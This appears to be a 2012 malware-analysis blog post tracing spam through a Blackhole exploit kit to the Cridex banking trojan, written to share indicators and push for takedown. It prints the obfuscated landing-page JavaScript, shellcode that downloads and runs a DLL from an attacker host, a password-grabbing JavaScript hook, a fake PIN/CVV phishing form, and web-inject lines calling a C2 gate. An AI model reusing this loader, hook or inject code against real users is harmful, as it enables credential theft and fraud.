"More" Spam to BHEK to Cridex; How they define, grab, handle & send the credentials + more things that we really (don't) need to know...
15 Dec 2012
*)Sorry friends, I wrote and did everything non-stop 12hrs, so please bear -
with my bad grammar since my brain looks starting to jam..This post is a wellknown bad actors that I always wrote,
I got many hints from everywhere (thank's @Hulk_Crusader, Dynamoo, + etc) that -
today's spam malvertisement has the direct link to theh00p://myadmin.sp-host.ru/page4.htm
..or went to the the hacked wordpress like the below pic:
after click to the marked link above user will be redirected to theh00p://myadmin.sp-host.ru/page4.htm
What's inside is this HTML redirected code...<pre class="brush: html">$ Xurl h00p://myadmin.sp-host.ru/page4.htm...to the BHEK2 landing page below contains the obfuscated JS/Code
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aviaonlolsio.ru:8080/forum/links/column.php";}
</script>
</body>
</html>h00p://aviaonlolsio.ru:8080/forum/links/column.phpIgnoring the HTML code, that landing page fuzzy code's structure is as per below://----------------------structure-------------------Remember to always make things simple :-) Start joining the scattered/deobfs'ed vars...
// jar applet part.....
<applet archive="/forum/links/column.php?fubzjr=dgfxdx&vxsk=eauuz" code="hw">
<param name="val" value="Dyy3OjjVv8"/>
<param name="prime" value="Vto-t-i8twlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xt.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tR0b6.RSUbARMUb3" />
</applet>
<div></div>
// first part of the script...
dd="i";
if(document.getElementsByTagName("div")[0].style.left==="")
{ss=String.fromCharCode;}
pp="eIn";
// scattered deobfs'd data under tag <i> from var 0,1,..,29
<i
0="-0kjh4k3-05ke5j2..."
1=
:
:
29="-7i1kjhk-9k3g38f..."
>
// second part of the script....
if(document.getElementsByTagName("d"+"iv")[0].style.left===""){a=document["getElementsB"+"yTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++){
r=a.getAttribute(i);
if(r){s=s+r;}else break;}
a=s;
s=new String();
e=window["eva"+"l"];
p=parseInt;
for(i=0;a.length>i;i+=2){
if(a.substr(i,1)=="-")i+=2;
if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));}
c=s;
e(c)}
//-----------------------end of structure----------dd="i";And pumped in the i tag values as per it is & runs it in your Rhino or SpiderMonket (Java Engines/Emulator) to get the - Plugin Detect here --->>[PASTEBIN] Straight to the point, let's crack the shellcode parts, see - the function getShellCode() part, and change the function into below - usual drill:
pp="eIn";
if(document.getElementsByTagName("div")[0].style.left==="")
{
ss=String.fromCharCode;
}
if(document.getElementsByTagName("div")[0].style.left==="")
{
a=document["getElementsByTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++)
{
r=a.getAttribute(i);
if(r)
{
s=s+r;
}
else break;
}
a=s;
s=new String();
p=parseInt;
for(i=0;a.length>i;i+=2)
{
if(a.substr(i,1)=="-")i+=2;
if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));
}
c=s;
eval(c)
}var a = "8200!%8582!%2551!%e0c4!%51f4!%1525!%34e0!%5191!%e054!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%74e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%14↑Run it & your'll get the shellcode after stripping the "%u" strings of the run's result..
:
:
!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e90!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
x= a["replace"](/\%!/g, "%" + "u");
document.write(x);41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.looks like the payload url is not seen if we don't dis-assembly this, so let's dis-assembly it (use many shellcode analyzer tools you prefer)
e9 09 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
: : :
58 40 58 17 47 4e 15 1b 18 12 19 46 12 19 41 12 [email protected].
19 41 12 1b 1b 0e 59 4d 15 1a 5e 12 19 43 12 19 .A....YM..^..C..
45 12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 E........C..C...
12 19 42 12 19 47 0e 45 15 19 43 0e 51 52 15 4f ..B..G.E..C.QR.O
0e 4c 52 15 58 28 28 00 .LR.X((.0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)So we got the payload url here:
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=pThis time I just runs it in my test PC browser & download & plays with it. To have downloads with the varied names like pics below: *) If you would like to grab it with saver mode see previous posts pls. All of them is actually same files:about.exe 06c032711f0cfae2c443b3926253b296
contacts.exe 06c032711f0cfae2c443b3926253b296
info.exe 06c032711f0cfae2c443b3926253b296
readme.exe 06c032711f0cfae2c443b3926253b296A quick binary analysis
Shortly, like usual, is a Cridex, trojan password stealer. Let's see peek the PE info's (not much info though)$ ls -alF ./sample
-rwx------ 1 xxxx xxxx 120320 Dec 14 09:38 ./sample*
// hex
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 08 00 8C 32 CB 50 00 00 00 00 PE..L....2.P....
0090 00 00 00 00 E0 00 0F 03 0B 01 06 09 00 24 00 00 .............$..
00A0 00 60 00 00 00 02 00 00 40 12 00 00 00 10 00 00 .`......@.......
00B0 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 .@....@.........
00C0 04 00 00 00 05 00 04 00 04 00 00 00 00 00 00 00 ................
00D0 00 30 02 00 00 04 00 00 12 A2 00 00 02 00 00 00 .0..............
: : :
// disassembly 1st block...
0x401240 mov ebp esp
0x401241 sub esp 0x8
0x401243 mov [esp] 0x2
0x401246 call [0x40912c]
0x40124d call 0x401100L
0x401253 nop
0x401258 lea esi [esi+0x0]
0x401259 push ebp
0x401260 mov ecx [0x409164]
0x401261 mov ebp esp
0x401267 pop ebp
0x401269 jmp ecx
: : :
//PE Analysis:
MD5: 06c032711f0cfae2c443b3926253b296
SHA-1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a
File Size: 120,320 Bytes
Image Base : 0x400000
Entry Point: 0x1000
Sections:
.text 0x1000 0x238c 9216 < EP
.data 0x4000 0x10e0 4608
.rdata 0x6000 0x1920 6656
.bss 0x8000 0x200 0
.idata 0x9000 0x3fc 1024
.rsrc 0xa000 0xbc4 3072
DATA 0xb000 0x17000 94208 <==== packed..
DATA 0x22000 0x1000 512
//Suspicious Points:
CRC Failed: Claimed: 41490 Actual: 181202
Compiled Time: 0x50CB328C [Fri Dec 14 14:07:08 2012 UTC] // freshies! :-))
Packer: MinGW GCC 3.x <==== this mess making hard to read
// loaded DLLs:
ntdll.dl 0x7C900000 0x000AF000
kernel32.dl 0x7C800000 0x000F6000
msvcrt.dll 0x77C10000 0x00058000
// The traces of calls that are "readable":
KERNEL32.dll.AddAtomA Hint[1]
KERNEL32.dll.ExitProcess Hint[155]
KERNEL32.dll.FindAtomA Hint[175]
KERNEL32.dll.GetAtomNameA Hint[220]
KERNEL32.dll.GetModuleHandleA Hint[335]
KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]So what happened if we run this malware? (summary)
I'll make it short and simple, is a Cridex..it drops junks to %Temp% (like exp*.tmp) +also %AppData% & self deleted - and then execute CMD to exec %AppData%\KB00085031.exe" (after being self-copied/dropped)These processes was kicked off by KB00085031.exectfmon.exe // with code injection into other processes
svchost.exeNetwork Analysis
For the network traffic, it does exactly as per - described in previous post here--->[PrevPost]I'm sorry friends, there's nothing new in it.(Main Course) How the stolen information grabbed & sent..
I will describe a shocky facts that I frannkly just realized, After being advised by Blake (with thank's!), author of legendary tool Jsunpack, let me try to explain as per below: The incoming data which looks like binary which was encyrpted was - actually decoded by the malware itself and saved it as binary in a registry key <==POINT! In this case the key is at:HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\[random]\And is ahving the value of below strings:3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22Copy & paste this code in binary editor you'll get view below: OK, is a TEXT. So let's save it as text file to view it well... Snipped below:
34 39 64 63 38 39 66 30 36 38 65 38 63 36 32 65
35 35 39 33 31 32 65 31 66 63 32 30 33 66 38 39
62 66 64 39 65 38 38 36 22 3E 3C 68 74 74 70 73
:
snipped<settings hash="49dc89f068e8c62e559312e1fc203f89bfd9e886"><httpshots..You can see the beautiful format of raw one here --->>[PASTEBIN]
/(html|plain)">/bb/logon/</url><url contentType="^text/(html|plain)">..
ccm/</url><url contentType="^text/(html|plain)">/cmmain\.cfm</url><ur..
="^text/(html|plain)">/ebc_ebc1961/</url><url contentType="^text/(htm..
entType="^text/(html|plain)">/livewire/</url><url contentType="^text/..
ser/</url><url contentType="^text/(html|plain)">/smallbiz/</url><url..
in)">2checkout\.com</url><url contentType="^text/(html|plain)">ablv\...
ain)">accountoverview\.aspx</url><url contentType="^text/(html|plain)..
pe="^text/(html|plain)">achworks\.com</url><url contentType="^text/(h..
com</url><url contentType="^text/(html|plain)">atbonlinebusiness\.com..
">baltikums\.eu</url><url contentType="^text/(html|plain)">banesco\.c..
banking\.firsttennessee\.biz</url><url contentType="^text/(html|plain..
^text/(html|plain)">business\.swedbank\.lv</url><url contentType="^te..
: : :What is this?
This is the configuration file of the Trojan stealer itself. In this data was defined well, what to fetch, where to fetch, how to send, where to send, how to fraud, how to encrypt the data, etc. I'll make some example below: It defined https saved data of banking/cashing online sites, & how to- fetch the patch contains the credentials' handle config:https://(www\.|)cashanalyzer\.com/↑following the domain is path of credentials.. Defining domains of other bankig/cash online sites:
https://(www\.|)enternetbank\.com/
https://(www\.|)nashvillecitizensbank\.com/
https://.*citizensbank\.com/
https://.+\.firsttennessee\.com/
https://.*firstcitizens\.com/
https://(bolb\-(west|east)|www)\.associatedbank\.com/
https://.*secure\.fundsxpress\.com/
https://usgateway\d*\.rbs\.com/
https://(www\.|)svbconnect\.com/
https?://(www\d*\.|)(ntrs|northerntrust)\.com/
https://cib\.bankofthewest\.com/
https://.+\.unionbank\.com/
https://webbankingforbusiness\.mandtbank\.com/
https://ifxmanager\.bnymellon\.com/
https://(ecash\.|.+/cashman/)
https://alphabank\.com
https://banking\.calbanktrust\.com/
https://(www\.|)efirstbank\.com/
https://singlepoint\.usbank\.com/
https://business-eb\.ibanking-services\.com/
https://www8\.comerica\.com/
https://.+\.53\.com/
https://businessonline\.tdbank\.com/
https://.+\.jpmorgan\.com/
https://(www\.|)cashanalyzer\.com/
https://business-eb\.ibanking-services\.com/
https://businessonline\.tdbank\.com
https://.+.tdcommercialbanking\.com/
https://chaseonline.chase.com
:
(and so many more of this..)business\.swedbank\.lv↑following by path of credentials.. Or also other sites with credentials....
myonline\.bankbv\.com
banknet\.lv
bankofcyprus\.com
bankonline\.sboff\.com
bankonline\.umpquabank\.com
bmoharrisprivatebankingonline\.com
:
:
(have about 10more of these...)https://.+/(wcmfd/wcmpw|phcp/servlet)/There is also javascript command to encrypt the credentials, before sent to theese moronz, see below:
https://.+/pub/html/
https://direct.53.com
:if(typeof window.EncryptPassword=='function')Not only those above, these moronz also faking online banking page to directly fooled you & phish your account credentials too, PoC:
{
var fn=window.EncryptPassword;
window.EncryptPassword=function(id)
{
try
{
var e=document.getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);
}
catch(e)
{
}
return fn(id);
};
}<td class="inputField1" align="right">Also making your PC as botnet. i.e.: there goes my poor test PC info - which was sent to CnC as Bot....
ATM or Debit Card PIN:
</td>
<td class="initialtext" style="padding:4px;" >
<input type="password" class="myinputs" id="acpin" maxlength="12" size="3" name="acpin" />
</td>
</tr>
<tr>
<td class="inputField1" align="right">
3- or 4-digits security code:
</td>
<td class="initialtext" style="padding:4px;" >
<input type="password" class="myinputs" id="cvv" maxlength="4" size="3" name="cvv2" />
</td>
</tr>
<tr>
<td colspan="2">
<p class="graytext">
Please be patient as we process your information.</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
</td>
<td>
<!-- BEGIN art_SA_edu_edu_instr.xml -->
<span class="bodytext">
Click "Next" to continue Identity verification process.
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
</td>
</tr>
<tr>
<td colspan="2">
</td>
</tr>
<tr>
<td>
</td>
<td>
<span class="bodytext">
<label title="Go to Enter Card">
</label>
</span>
</td>
</tr>
<tr>
:
etc etc<modify><pattern>so, practically your infected PC (like- my test machine, was mentioned as Bot in CnC...) The sent URL format for phishs data are plain text at:
<![CDATA[</html.*?>(.*?)]]></pattern><replacement>
<![CDATA[<script type="text/javascript"
src="h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase"></script>]]><
/replacement></modify></actions></httpinject>
<httpinject><conditions><url type="deny">\.(css|js)($|\?)</url>
<url type="allow" contentType="^text/(html|plain)">h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargoIndicatingthe CnC data collector in the proxy of
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica78.159.121.128:8080via below path/urih00p://78.159.121.128:8080/career/ h00p://78.159.121.128:8080/ipckg/gate.phpGentlemen, Blake tested these path, and I did it too, match to ALL previous latest findings we made. No changes so far. Better to shutdown the 78.159.121.128 soon, which will slowing their movement in infections. And.. Maybe you will find additional other shocky or useful facts? Please share! :-)Virus Total Detection Ratio
The Payload is... (Wanna bet? Lower than 5 or less?) Here:SHA1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a MD5: 06c032711f0cfae2c443b3926253b296 File size: 117.5 KB ( 120320 bytes ) File name: test89237201835362.bin File type: Win32 EXE DetectionRatio: 5 / 46 Analysis date: 2012-12-14 21:10:08 UTC ( 1 時間, 15 分 ago ) URL ---------->>[CLICK]With Interesting Malware Names: TrendMicro-HouseCall : PAK_Generic.001 Sophos : Mal/Zbot-IQ TrendMicro : PAK_Generic.001 Kaspersky : Trojan.Win32.Bublik.wcz Panda : Trj/Genetic.genWhile the landing page is...(I cannot upload it to VT somehow...@virustotal Please help, I waited 15minutes & cannot upload new BHEK2 obfuscation of blackhole in VT (pic) Cc: @jcanto twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) December 15, 2012What's the moral of this story?
Firstly, please grep whether your banks are in the list of target list. (Again) See the pastebin here to search-->>[PASTEBIN]Now you maybe understand why we always tweet about this group? Can you imagine how frustrated we are to report this case for 4 month w/o- being followed properly by authority? <==PoC: Spams of these still spotted! This moronz team is sending hundreds spam daily with 50more redirectors & ending up to multi IP address (3 or 4) landing page with PluginDetect BHEK2 payloads of these...Sample Download
Sorry friends, this time only sample -->>[CLICK]Some Network Information
Domain: aviaonlolsio.ruserial = 2012010101
refresh = 604800 (7 days)
retry = 1800 (30 mins)
expire = 1800 (30 mins)
default TTL = 60 (1 min)
aviaonlolsio.ru. 56 IN A 217.112.40.69
aviaonlolsio.ru. 56 IN A 91.142.208.144
ns1.aviaonlolsio.ru. 59 IN A 69.64.89.82
ns2.aviaonlolsio.ru. 3600 IN A 62.76.189.72 85.143.166.202
ns3.aviaonlolsio.ru. 3600 IN A 41.168.5.140
ns4.aviaonlolsio.ru. 3600 IN A 209.51.221.247
ns5.aviaonlolsio.ru. 3600 IN A 42.121.116.38
ns6.aviaonlolsio.ru. 3600 IN A 110.164.58.250
ns7.aviaonlolsio.ru. 60 IN A 209.51.221.247
ns8.aviaonlolsio.ru. 60 IN A 163.10.12.83
ns9.aviaonlolsio.ru. 60 IN A 216.99.149.226
ns10.aviaonlolsio.ru. 60 IN A 208.87.243.196
ns11.aviaonlolsio.ru. 60 IN A 203.146.208.180
ns12.aviaonlolsio.ru. 60 IN A 74.117.61.66
registrar: NAUNET-REG-RIPN
created: 2012.12.07
paid-till: 2013.12.07
free-date: 2014.01.07
source: TCI
Last updated on 2012.12.15 05:51:35 MSK
// IP Infector history:
pelamutrika.ru A 91.142.208.144
aliamognoa.ru A 91.142.208.144
ahiontota.ru A 91.142.208.144
anifkailood.ru A 91.142.208.144
podarunoki.ru A 91.142.208.144
aseniakrol.ru A 91.142.208.144
publicatorian.ru A 91.142.208.144
pitoniamason.ru A 91.142.208.144
amnaosogo.ru A 91.142.208.144
aviaonlolsio.ru A 91.142.208.144
dimarikanko.ru A 91.142.208.144
adanagenro.ru A 91.142.208.144
awoeionfpop.ru A 91.142.208.144
aofngppahgor.ru A 91.142.208.144
pelamutrika.ru A 217.112.40.69
aliamognoa.ru A 217.112.40.69
podarunoki.ru A 217.112.40.69
aseniakrol.ru A 217.112.40.69
pitoniamason.ru A 217.112.40.69
aviaonlolsio.ru A 217.112.40.69
adanagenro.ru A 217.112.40.69
aofngppahgor.ru A 217.112.40.69
"MalwareMustDie!